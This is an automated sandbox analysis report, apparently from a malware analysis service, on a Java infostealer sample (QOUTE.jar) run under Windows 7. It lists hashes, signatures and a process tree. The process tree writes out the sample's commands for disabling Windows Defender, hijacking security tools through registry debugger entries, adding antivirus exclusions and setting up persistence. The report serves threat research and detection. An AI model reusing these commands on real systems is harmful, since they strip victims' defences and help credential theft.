Analysis
-
max time kernel
142s -
max time network
123s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
12-07-2020 08:14
Static task
static1
Behavioral task
behavioral1
Sample
QOUTE.jar
Resource
win7v200430
Behavioral task
behavioral2
Sample
QOUTE.jar
Resource
win10
General
-
Target
QOUTE.jar
-
Size
402KB
-
MD5
0a79ac74d72bd78b14f2620336eb8154
-
SHA1
cb35e25fd05a342c3201cc7e7c81aa4f7fca99f7
-
SHA256
b52f595bcd319fb9a253efa0c694fcaea8662b0fd34bb384612c1006cc112bd8
-
SHA512
7b74e2c7568a38045c1d760589193e716767e568809391980df03f197515ced2c535ad0d1612e5d05f56ab1684b4bbae562764606a96106909c00e848ccf784a
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
XenAllPasswordPro.exepid process 2896 XenAllPasswordPro.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run entry to start application 2 TTPs 4 IoCs
Processes:
java.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\RfEhfcm = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\roBcX\\xvPwc.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\RfEhfcm = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\roBcX\\xvPwc.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
Processes:
java.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Users\Admin\roBcX\Desktop.ini java.exe File created C:\Users\Admin\roBcX\Desktop.ini java.exe File opened for modification C:\Users\Admin\roBcX\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\roBcX\Desktop.ini attrib.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
java.exepid process 1520 java.exe -
Suspicious use of WriteProcessMemory 544 IoCs
Processes:
java.execmd.execmd.execmd.exedescription pid process target process PID 1520 wrote to memory of 1048 1520 java.exe cmd.exe PID 1520 wrote to memory of 1048 1520 java.exe cmd.exe PID 1520 wrote to memory of 1048 1520 java.exe cmd.exe PID 1520 wrote to memory of 1036 1520 java.exe cmd.exe PID 1520 wrote to memory of 1036 1520 java.exe cmd.exe PID 1520 wrote to memory of 1036 1520 java.exe cmd.exe PID 1036 wrote to memory of 1536 1036 cmd.exe WMIC.exe PID 1036 wrote to memory of 1536 1036 cmd.exe WMIC.exe PID 1036 wrote to memory of 1536 1036 cmd.exe WMIC.exe PID 1520 wrote to memory of 1176 1520 java.exe cmd.exe PID 1520 wrote to memory of 1176 1520 java.exe cmd.exe PID 1520 wrote to memory of 1176 1520 java.exe cmd.exe PID 1176 wrote to memory of 1804 1176 cmd.exe WMIC.exe PID 1176 wrote to memory of 1804 1176 cmd.exe WMIC.exe PID 1176 wrote to memory of 1804 1176 cmd.exe WMIC.exe PID 1520 wrote to memory of 1768 1520 java.exe attrib.exe PID 1520 wrote to memory of 1768 1520 java.exe attrib.exe PID 1520 wrote to memory of 1768 1520 java.exe attrib.exe PID 1520 wrote to memory of 1812 1520 java.exe attrib.exe PID 1520 wrote to memory of 1812 1520 java.exe attrib.exe PID 1520 wrote to memory of 1812 1520 java.exe attrib.exe PID 1520 wrote to memory of 520 1520 java.exe attrib.exe PID 1520 wrote to memory of 520 1520 java.exe attrib.exe PID 1520 wrote to memory of 520 1520 java.exe attrib.exe PID 1520 wrote to memory of 664 1520 java.exe attrib.exe PID 1520 wrote to memory of 664 1520 java.exe attrib.exe PID 1520 wrote to memory of 664 1520 java.exe attrib.exe PID 1520 wrote to memory of 464 1520 java.exe attrib.exe PID 1520 wrote to memory of 464 1520 java.exe attrib.exe PID 1520 wrote to memory of 464 1520 java.exe attrib.exe PID 1520 wrote to memory of 756 1520 java.exe attrib.exe PID 1520 wrote to memory of 756 1520 java.exe attrib.exe PID 1520 wrote to memory of 756 1520 java.exe attrib.exe PID 1520 wrote to memory of 1144 1520 java.exe attrib.exe PID 1520 wrote to memory of 1144 1520 java.exe attrib.exe PID 1520 wrote to memory of 1144 1520 java.exe attrib.exe PID 1520 wrote to memory of 1356 1520 java.exe attrib.exe PID 1520 wrote to memory of 1356 1520 java.exe attrib.exe PID 1520 wrote to memory of 1356 1520 java.exe attrib.exe PID 1520 wrote to memory of 1640 1520 java.exe cmd.exe PID 1520 wrote to memory of 1640 1520 java.exe cmd.exe PID 1520 wrote to memory of 1640 1520 java.exe cmd.exe PID 1520 wrote to memory of 1604 1520 java.exe powershell.exe PID 1520 wrote to memory of 1604 1520 java.exe powershell.exe PID 1520 wrote to memory of 1604 1520 java.exe powershell.exe PID 1520 wrote to memory of 1636 1520 java.exe reg.exe PID 1520 wrote to memory of 1636 1520 java.exe reg.exe PID 1520 wrote to memory of 1636 1520 java.exe reg.exe PID 1520 wrote to memory of 1624 1520 java.exe reg.exe PID 1520 wrote to memory of 1624 1520 java.exe reg.exe PID 1520 wrote to memory of 1624 1520 java.exe reg.exe PID 1520 wrote to memory of 1580 1520 java.exe taskkill.exe PID 1520 wrote to memory of 1580 1520 java.exe taskkill.exe PID 1520 wrote to memory of 1580 1520 java.exe taskkill.exe PID 1520 wrote to memory of 1948 1520 java.exe reg.exe PID 1520 wrote to memory of 1948 1520 java.exe reg.exe PID 1520 wrote to memory of 1948 1520 java.exe reg.exe PID 1640 wrote to memory of 1972 1640 cmd.exe reg.exe PID 1640 wrote to memory of 1972 1640 cmd.exe reg.exe PID 1640 wrote to memory of 1972 1640 cmd.exe reg.exe PID 1520 wrote to memory of 1968 1520 java.exe reg.exe PID 1520 wrote to memory of 1968 1520 java.exe reg.exe PID 1520 wrote to memory of 1968 1520 java.exe reg.exe PID 1520 wrote to memory of 1992 1520 java.exe reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1604 powershell.exe 1604 powershell.exe -
Sets file execution options in registry 2 TTPs 32 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe reg.exe -
Processes:
reg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
netsh.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe -
Suspicious use of AdjustPrivilegeToken 138 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 1536 WMIC.exe Token: SeSecurityPrivilege 1536 WMIC.exe Token: SeTakeOwnershipPrivilege 1536 WMIC.exe Token: SeLoadDriverPrivilege 1536 WMIC.exe Token: SeSystemProfilePrivilege 1536 WMIC.exe Token: SeSystemtimePrivilege 1536 WMIC.exe Token: SeProfSingleProcessPrivilege 1536 WMIC.exe Token: SeIncBasePriorityPrivilege 1536 WMIC.exe Token: SeCreatePagefilePrivilege 1536 WMIC.exe Token: SeBackupPrivilege 1536 WMIC.exe Token: SeRestorePrivilege 1536 WMIC.exe Token: SeShutdownPrivilege 1536 WMIC.exe Token: SeDebugPrivilege 1536 WMIC.exe Token: SeSystemEnvironmentPrivilege 1536 WMIC.exe Token: SeRemoteShutdownPrivilege 1536 WMIC.exe Token: SeUndockPrivilege 1536 WMIC.exe Token: SeManageVolumePrivilege 1536 WMIC.exe Token: 33 1536 WMIC.exe Token: 34 1536 WMIC.exe Token: 35 1536 WMIC.exe Token: SeIncreaseQuotaPrivilege 1536 WMIC.exe Token: SeSecurityPrivilege 1536 WMIC.exe Token: SeTakeOwnershipPrivilege 1536 WMIC.exe Token: SeLoadDriverPrivilege 1536 WMIC.exe Token: SeSystemProfilePrivilege 1536 WMIC.exe Token: SeSystemtimePrivilege 1536 WMIC.exe Token: SeProfSingleProcessPrivilege 1536 WMIC.exe Token: SeIncBasePriorityPrivilege 1536 WMIC.exe Token: SeCreatePagefilePrivilege 1536 WMIC.exe Token: SeBackupPrivilege 1536 WMIC.exe Token: SeRestorePrivilege 1536 WMIC.exe Token: SeShutdownPrivilege 1536 WMIC.exe Token: SeDebugPrivilege 1536 WMIC.exe Token: SeSystemEnvironmentPrivilege 1536 WMIC.exe Token: SeRemoteShutdownPrivilege 1536 WMIC.exe Token: SeUndockPrivilege 1536 WMIC.exe Token: SeManageVolumePrivilege 1536 WMIC.exe Token: 33 1536 WMIC.exe Token: 34 1536 WMIC.exe Token: 35 1536 WMIC.exe Token: SeIncreaseQuotaPrivilege 1804 WMIC.exe Token: SeSecurityPrivilege 1804 WMIC.exe Token: SeTakeOwnershipPrivilege 1804 WMIC.exe Token: SeLoadDriverPrivilege 1804 WMIC.exe Token: SeSystemProfilePrivilege 1804 WMIC.exe Token: SeSystemtimePrivilege 1804 WMIC.exe Token: SeProfSingleProcessPrivilege 1804 WMIC.exe Token: SeIncBasePriorityPrivilege 1804 WMIC.exe Token: SeCreatePagefilePrivilege 1804 WMIC.exe Token: SeBackupPrivilege 1804 WMIC.exe Token: SeRestorePrivilege 1804 WMIC.exe Token: SeShutdownPrivilege 1804 WMIC.exe Token: SeDebugPrivilege 1804 WMIC.exe Token: SeSystemEnvironmentPrivilege 1804 WMIC.exe Token: SeRemoteShutdownPrivilege 1804 WMIC.exe Token: SeUndockPrivilege 1804 WMIC.exe Token: SeManageVolumePrivilege 1804 WMIC.exe Token: 33 1804 WMIC.exe Token: 34 1804 WMIC.exe Token: 35 1804 WMIC.exe Token: SeIncreaseQuotaPrivilege 1804 WMIC.exe Token: SeSecurityPrivilege 1804 WMIC.exe Token: SeTakeOwnershipPrivilege 1804 WMIC.exe Token: SeLoadDriverPrivilege 1804 WMIC.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
XenAllPasswordPro.exepid process 2896 XenAllPasswordPro.exe -
Views/modifies file attributes 1 TTPs 8 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 664 attrib.exe 464 attrib.exe 756 attrib.exe 1144 attrib.exe 1356 attrib.exe 1768 attrib.exe 1812 attrib.exe 520 attrib.exe -
Loads dropped DLL 3 IoCs
Processes:
java.exeXenAllPasswordPro.exepid process 1520 java.exe 1520 java.exe 2896 XenAllPasswordPro.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1580 taskkill.exe 1372 taskkill.exe 2440 taskkill.exe 2664 taskkill.exe 580 taskkill.exe 1544 taskkill.exe 2200 taskkill.exe 1792 taskkill.exe 1836 taskkill.exe 2220 taskkill.exe 2824 taskkill.exe 3024 taskkill.exe 3068 taskkill.exe 2116 taskkill.exe 1608 taskkill.exe 1816 taskkill.exe -
Checks for installed software on the system 1 TTPs 20 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key opened \REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall reg.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\software\microsoft\windows\currentversion\uninstall reg.exe Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\software\microsoft\windows\currentversion\uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName reg.exe Key opened \REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall reg.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName reg.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName reg.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName reg.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Drops file in System32 directory 2 IoCs
Processes:
java.exedescription ioc process File created C:\Windows\System32\cfPjE java.exe File opened for modification C:\Windows\System32\cfPjE java.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\QOUTE.jar1⤵
- Adds Run entry to start application
- Drops desktop.ini file(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Drops file in System32 directory
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\roBcX\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\roBcX\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\roBcX2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\roBcX\xvPwc.class2⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\roBcX','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\roBcX\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
- Checks for installed software on the system
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵
- Checks for installed software on the system
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
- Sets file execution options in registry
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
-
